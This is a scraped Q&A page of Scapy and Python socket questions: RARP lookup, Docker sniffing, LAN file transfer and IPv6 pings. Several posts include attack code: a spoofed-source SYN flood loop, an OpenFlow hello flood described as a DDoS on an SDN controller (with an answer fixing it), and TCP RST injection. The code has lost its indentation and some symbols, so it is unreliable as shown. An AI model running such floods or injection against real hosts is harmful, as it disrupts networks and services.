How to send a RARP-request using Scapy in Python - python-3.x

I am trying to fetch an ip address of a remote machine B from my machine A using mac address of Machine B. Both A & B are on same subnet. I am trying to use Scapy library in python and issuing a RARP request.
Below is my code. I am getting 0.0.0.0 as ouput.
import scapy.all as scapy
def get_ip(mac):
arp_request=scapy.ARP(op=3, hwdst=mac)
broadcast = scapy.Ether(dst = 'ff:ff:ff:ff:ff:ff')
arp_request_broadcast = broadcast / arp_request
# print('$$$', arp_request_broadcast.show())
answered_list=scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
unanswered_list=scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[1]
response = {'answered_list':answered_list, 'unanswered_list':unanswered_list}
print('unanswered_list',unanswered_list[0].pdst)
return response
macB='Mac address of machine B'
obj=get_ip(macB)
print(obj)
Output:
unanswered_list 0.0.0.0
{'answered_list': <Results: TCP:0 UDP:0 ICMP:0 Other:0>, 'unanswered_list': <Unanswered: TCP:0 UDP:0 ICMP:0 Other:1>}

Related

Scapy & Docker: Get container's IP address w/o using Container ID?

What is the easiest way to compare IP addresses using Scapy (in Python3.6) and Docker? I have a piece of code that sniffs my Docker bridge network using Scapy sniff(). I want to look at each packet's source IP address, and if it matches the IP address for my container named "plc1", do additional steps. If they don't match, I just return an empty list and move on.
However I cannot figure out how to compare a packet's source IP address to a container name. It really needs to be the container's name and not the ID, since I am running a ton of containers in parallel and looking up ID's to plug into my Python3.6 script is tedious. Any thoughts? I've tried using the Docker SDK but it needs the Container ID, which is what I am trying to avoid...
Sample Python3.6 code, which does not work, included below:
#!/usr/bin/env python3
from scapy.all import *
def find_ports(pkt):
# if src IPaddr matches IP addr of container plc1...
if pkt[IP].src == 'plc1': # THIS DOES NOT WORK
# if there is a match, get some additional packet info
if TCP in pkt:
tcp_dport = pkt[TCP].dport
ip_total_len = pkt.getlayer(IP).len
ip_header_len = pkt.getlayer(IP).ihl * 32 / 8
tcp_header_len = pkt.getlayer(TCP).dataofs * 32 / 8
tcp_seg_len = ip_total_len - ip_header_len - tcp_header_len
sequence_num = pkt[1].ack
return [tcp_dport, tcp_seg_len, sequence_num]
# else if NO MATCHING ip addr's, return blank list...
else:
return []
tempList = sniff(filter="ip", prn=find_ports, iface="br-19f0ba1cf88f")
# if templist not empty...
if tempList:
# send a TCP RST packet...
ip = IP(src="plc1", dst="hmi_pass_thru")
tcp = TCP(sport=502, dport=tempList[0], flags="R", seq=int(tempList[1]), ack=int(tempList[2]) + 1)
pkt = ip / tcp
ls(pkt)
send(pkt, verbose=0)

Forwarding packets to windows

I wrote a code to send a packet from my Kali Linux machine to my Windows PC but the packet doesn't show in Wireshark. There are no errors in the code and it sends the packets but they are not received.
Any one can help ?
#!/usr/bin/python
from scapy.all import *
def synflood(src,tgt,message):
for dport in range(1024,65535):
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=4444, dport=dport)
RAWlayer = Raw(load=message)
pkt = IPlayer/TCPlayer
send(pkt)
source = input("src: ")
target = input("targert : ")
message = input(" load : ")
while True:
synflood(source,target,message)
Update: So i fixed the problem! i tried replacing the for statement by "dport = 80" and for the target IP i chose another dest IP than my pc aand it showed up in wireshark, that's how i realised that i should configure an internal VM network instead of the bridged one , and it worked

Unable to create OpenFlow13 message with Scapy

I am writing a code where I am capturing openflow13 packets using tcpdump and wireshark. I am running mininet topo and floodlight SDN controller. Once I get my SDN controller IP and port details from the capture, I intent to create multiple OFPTHello messages and send it to the SDN Controller [sort of DDoS attack]. Although I am able to extract the controller's details, I am unable to create Scapy OFPTHello message packets.
Request to please help me identify and resolve the issue
Mininet Topo I am running-
sudo mn --topo=linear,4 --mac --controller=remote,ip=192.168.56.102 --switch=ovsk,protocols=OpenFlow13
My Code-
#!/usr/bin/env python3
try:
import time
import subprocess
import json
import sys
from scapy.all import *
from scapy.contrib.openflow import _ofp_header
from scapy.fields import ByteEnumField, IntEnumField, IntField, LongField, PacketField, ShortField, XShortField
from scapy.layers.l2 import Ether
ofp_table = {0xfe: "MAX",
0xff: "ALL"}
ofp_buffer = {0xffffffff: "NO_BUFFER"}
ofp_version = {0x04: "OpenFlow 1.3"}
ofp_type = {0: "OFPT_HELLO"}
class OFPHET(_ofp_header):
#classmethod
def dispatch_hook(cls, _pkt=None, *args, **kargs):
if _pkt and len(_pkt) >= 2:
t = struct.unpack("!H", _pkt[:2])[0]
return ofp_hello_elem_cls.get(t, Raw)
return Raw
def extract_padding(self, s):
return b"", s
class OFPTHello(_ofp_header):
name = "OFPT_HELLO"
fields_desc = [ByteEnumField("version", 0x04, ofp_version),
ByteEnumField("type", 0, ofp_type),
ShortField("len", None),
IntField("xid", 0),
PacketListField("elements", [], OFPHET, length_from=lambda pkt: pkt.len - 8)]
# Capture controller's IP address and Port
Hello_Msg = []
Switch_TCP_Port = []
p = subprocess.Popen(['sudo', 'tcpdump', '-i', 'eth1', 'port', '6653', '-w', 'capture.pcap'], stdin=subprocess.PIPE, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
time.sleep(45)
p.terminate()
captures = rdpcap('capture.pcap')
for capture in captures:
msg = (capture.summary()).split(" ")
i = len(msg)
if (msg[i-1] == "OFPTFeaturesRequest"):
Features_Request = capture.summary()
break;
elif (msg[i-1] == "OFPTHello"):
Hello_Msg.append(capture.summary())
for Hello in Hello_Msg:
frame = Hello.split("/")[2]
port = ((frame.split(" ")[2]).split(":"))[1]
Switch_TCP_Port.append(port)
Features_Request = Features_Request.split("/")[2]
Source_Frame = (Features_Request.split(" ")[2]).split(":")
Controller_IP = Source_Frame[0]
Controller_Port = int(Source_Frame[1])
print("\nController's IP Address: %s"%Controller_IP)
print("Controller's Port: %s"%Controller_Port)
# Generating Openfow PAcket_In using Scapy
for p in Switch_TCP_Port:
p = int(p)
packet = Ether(src='08:00:27:fa:75:e9',dst='08:00:27:f1:24:22')/IP(src='192.168.56.101',dst=Controller_IP)/TCP(sport=p,dport=Controller_Port)/OFPTHello()
send(packet)
except ImportError as e:
print ("\n!!! ImportError !!!")
print ("{0}. Install it.\n".format(e))
Wireshark Capture- [Only has 4 hello packets, no Scapy packets are captured]
Question/Issue- I am able to receive the ideal number of 4 hello packets from the mininet topology. However, the new hello packets I am trying to create using scapy are not being sent/ captured by wireshark. I have attached my scapy code for reference.
In your code do this
modify the line:
send(packet)
To
send(packet,iface='eth1') where eth1 is the egress interface of the attacking VM
The reason is that even if a malformed Openflow packet is put on the wire, Wireshark will still be able to capture it, assuming your attack VM has a route to the controller VM. This means that your code is not putting the Packet on the right wire, send(packet,iface='eth1') will put it on the right wire.

How to fix windows decline error for lan file transfer

I'm a 14 year old beginner in software design but have good knowledge in python basic and acute amounts in networking. i recently got a raspberry pi 3 b+ brand new and am trying to make a python program that will allow me to transmit information input from my hp PC to my pi so it can display the info, this project is to help me with school, i have code typed and it runs but when i try to run the "client code", this is so my pi can receive the input data, i get an error saying that the device has declined my connection request, what should i do to fix the issue? if you want to see the code i can post it, but i'm not sure if that is necessary.
i only tried changing the port number in both programs, since that is not the issue and i' new to LAN and networking, i haven't tried anything else.
as requested my code is:(not HTML, CSS, or HTML. it's just easier to use that interface.
# send.py
import socket # Import socket module
port = 60000 # Reserve a port for your service.
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
s.bind((host, port)) # Bind to the port
s.listen(5) # Now wait for client connection.
print 'Server listening....'
while True:
conn, addr = s.accept() # Establish connection with client.
print 'Got connection from', addr
data = conn.recv(1024)
print('Server received', repr(data))
filename='mytext.txt'
f = open(filename,'rb')
l = f.read(1024)
while (l):
conn.send(l)
print('Sent ',repr(l))
l = f.read(1024)
f.close()
print('Done sending')
conn.send('Thank you for connecting')
conn.close()
# recieve.py
import socket # Import socket module
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
port = 60000 # Reserve a port for your service.
s.connect((host, port))
s.send("Hello server!")
with open('received_file', 'wb') as f:
print 'file opened'
while True:
print('receiving data...')
data = s.recv(1024)
print('data=%s', (data))
if not data:
break
# write data to a file
f.write(data)
f.close()
print('Successfully get the file')
s.close()
print('connection closed')
Unfortunately, this answer requires Python 3.5+.
Before running this code please make sure you've worked out which IP you will be using for your server and client (help at the bottom).
Step 1 - Ensure a simple ping works
Server code:
import socket
# FIND IP
# The IP to use will be different depending
# on whether you have WiFi or Ethernet, so
# you need to choose whichever one that is
ips = socket.gethostbyname_ex(socket.gethostname())[-1]
print(*[f"{i}: {j}" for i, j in enumerate(ips)], sep="\n")
ip = ips[int(input(" > "))]
# SELECT PORT
port = 10000
#SETUP SERVER
# Create server socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((ip, port))
# A queue of 1 clients is more than enough for our application
sock.listen(1)
print(f"Listening on {ip}:{port}")
while True:
try:
(clientsock, address) = sock.accept()
# so if there's nothing to read we don't wait too long
clientsock.settimeout(0.01)
ping_string = clientsock.recv(5).decode()
if ping_string == "ping!":
print("ping!")
clientsock.sendall(b"ping!")
else:
print("no ping!")
print(ping_string)
clientsock.sendall(b"nopng")
clientsock.shutdown(1)
clientsock.close()
except KeyboardInterrupt:
# Add a way to safely exit the infinite loop
break
sock.close()
Client code:
import socket
# GET IP
print("IP of server")
ip = input(" > ")
# SELECT PORT
port = 10000
# SETUP SOCKET
# Create server socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
print(f"Conencted to {ip}:{port}")
# so if there's nothing to read we don't wait too long
sock.settimeout(0.01)
sock.sendall(b"ping!")
ping_string = sock.recv(5).decode()
if ping_string == "ping!":
print("ping!")
else:
print("no ping!")
sock.close()
OUTPUT:
Server:
0: 192.168.56.1
1: 192.168.1.151
> 1
Listening on 192.168.1.151:10000
Client:
Type ip of server
> 192.168.1.151
Conencted to 192.168.1.151:10000
ping!
If this doesn't work, make sure your computer can ping your raspberry pi, and vice versa. Go into CMD (I presume your HP PC is Windows) and type ping ____ (replacing ____ with the internal ip address of your raspberry pi.
If the terminal doesn't appear to be pinging something, you need to go onto your computer and raspberry pi to find they're internal ips, which you can find out how to do online.
Step 2 - The fun part
We're now going to setup your file server.
Server code:
import socket
# OPEN FILE TO SEND ACROSS
with open("filesend.txt", mode="rb") as file:
file_string = file.read()
# FIND IP
# The IP to use will be different depending
# on whether you have WiFi or Ethernet, so
# you need to choose whichever one that is
ips = socket.gethostbyname_ex(socket.gethostname())[-1]
print(*[f"{i}: {j}" for i, j in enumerate(ips)], sep="\n")
ip = ips[int(input(" > "))]
# SELECT PORT
port = 10000
#SETUP SERVER
# Create server socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((ip, port))
# A queue of 1 clients is more than enough for our application
sock.listen(1)
print(f"Listening on {ip}:{port}")
while True:
try:
(clientsock, address) = sock.accept()
# so if there's nothing to read we don't wait too long
clientsock.settimeout(0.01)
# send length
clientsock.sendall((str(len(file_string)) + ".").encode())
clientsock.sendall(file_string)
print("Sent file!")
response_code = clientsock.recv(1).decode()
if response_code != "0":
print("ERROR! response was not 0")
print(response_code)
clientsock.shutdown(1)
clientsock.close()
except KeyboardInterrupt:
# Add a way to safely exit the infinite loop
break
sock.close()
Client code:
import socket
# SELECT IP
print("IP of server")
ip = input(" > ")
# SELECT PORT
port = 10000
# SETUP SOCKET
# Create server socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
print(f"Conencted to {ip}:{port}")
# so if there's nothing to read we don't wait too long
sock.settimeout(0.01)
# Get length of file sent across
len_string = ""
c = ""
while c != ".":
c = sock.recv(1).decode()
len_string += c
length = int(len_string[:-1])
file_string = sock.recv(length)
# send a status code back to the server
sock.sendall(b"0")
with open("filerecv.txt", mode="wb") as file:
file.write(file_string)
print(file_string.decode())
sock.close()
OUTPUT:
Server:
0: 192.168.56.1
1: 192.168.1.151
> 1
Listening on 192.168.1.151:10000
Client:
IP of server
> 192.168.1.151
Conencted to 192.168.1.151:10000
THIS IS A TEST!
Once again, ensure the ip you tell the client to connect to is the same as the one you have selected from the list provided in the server script. Also ensure that the ip address can be connected to, ie don't use the one for when the pc's on WiFi if it's currently on Ethernet.
Hope this works for you. Any issues leave down in the comments :)
EDIT
WINDOWS
Sample output from ipconfig:
> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : home
IPv6 Address. . . . . . . . . . . : 2a00:23c6:6586:2400:e47a:c60e:812b:1123
IPv6 Address. . . . . . . . . . . : fdaa:bbcc:ddee:0:e47a:c60e:812b:1123
Temporary IPv6 Address. . . . . . : 2a00:23c6:6586:2400:d1fe:95f5:27c3:c4b8
Temporary IPv6 Address. . . . . . : fdaa:bbcc:ddee:0:d1fe:95f5:27c3:c4b8
Link-local IPv6 Address . . . . . : fe80::e47a:c60e:812b:1123%19
IPv4 Address. . . . . . . . . . . : 192.168.1.151
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::8aa6:c6ff:fe23:7a15%19
192.168.1.254
You're looking for this line:
IPv4 Address. . . . . . . . . . . : 192.168.1.151
And the IP is whatever value is at the end (eg 192.168.1.151)
FIND THE IP OF YOUR RASPBERRY PI
Unless you've changed some advanced settings your Raspberry Pi's hostname will be raspberrypi, or raspberrypi.local. I've seen both. If you want to know the IP address, use the Python script below, and try to ping all the IPs from the list it prints to find out which one IP is actually used by the Pi.
Run this on your PC:
import socket
host1 = "raspberrypi"
host2 = "raspberrypi.local"
try:
ip1 = socket.gethostbyname_ex(host1)[-1]
except:
ip1 = []
try:
ip2 = socket.gethostbyname_ex(host2)[-1]
except:
ip2 = []
print(list(set(ip1+ip2)))
Any more issues, please let me know :)

Not able to communicate ping through scapy using global address while using multiple network cards

I am using 3 network cards on my ubuntu 14.04 machine. I am trying to simultaneously communicate to 3 different networks using three different network cards. I want to use IPv6 Global addresses.
Below is the network structure.
Interface_A (8003::2) <-----> Get0 (8003::1)
Interface_B (8001::2) <-----> Get1 (8001::1)
Interface_C (8002::2) <-----> Get2 (8002::1)
When I work with IPv6 link layer addresses, simultaneous communication is working. i.e. below code is working successfully.
dst_a="FE80::C1:4160" # get0
dst_c="FE80::3617:EBFF:FEAE:DEB4" # get2
src_a="FE80::3617:EBFF:FEAE:DEB5" # my_pc_interfac_A
src_c="FE80::523E:AAFF:FE08:8AAF" # my_pc_interface_C
IFACE_A = "eth0"
IFACE_C = "eth2"
echo_a = IPv6(src=src_a, dst=dst_a, nh=58) / ICMPv6EchoRequest(data='aaaa')
echo_c = IPv6(src=src_c, dst=dst_c, nh=58) / ICMPv6EchoRequest(data='cccc')
conf.iface = IFACE_A
a = sr1(echo_a)
a.display()
conf.iface = IFACE_C
c = sr1(echo_C)
c.display()
While below code is not working, only 1st ping is successful (echo_a). For the next one I am not getting any response. When I am working with only interface_C (echo_c) with global ipv6 addresses, echo_c is also working.
dst_a_global="8003::1" # get0
dst_c_global="8002::1" # get2
src_a_global="8003::2" # my_pc_interfac_A
src_c_global="8002::2" # my_pc_interface_C
IFACE_A = "eth0"
IFACE_C = "eth2"
echo_a = IPv6(src=src_a_global, dst=dst_a_global, nh=58) / ICMPv6EchoRequest(data='aaaa')
echo_c = IPv6(src=src_c_global, dst=dst_c_global, nh=58) / ICMPv6EchoRequest(data='cccc')
conf.iface = IFACE_A
a = sr1(echo_a)
a.display()
conf.iface = IFACE_C
c = sr1(echo_C)
c.display()
I am getting only echo_a output, for echo_c there is no response.
If I run echo_c first, I am not getting response for echo_a.
I expect that, for both the echo request there should be an echo reply. I am able to ping6 on all the interfaces.
Try to configure also the Ethernet layer yourself and see if it is working-
echo_a = Ether(src=YOUR_MAC, dst=33:33:00:01:00:03) / IPv6(src=src_a_global, dst=dst_a_global, nh=58) / ICMPv6EchoRequest(data='aaaa')
a = srp1(echo_a, iface=IFACE_A)
Also- I had some problems myself using IPv6 with multiple interfaces (using regular socket instead of Scapy, and Windows), take a look to see if you can find something relevant (I couldn't think of anything particular, but maybe it will help anyway)-
Windows doesn't receive multicast IPv6 packets from all interfaces
Sending IPv6 multicast packets through a specific network interface

Resources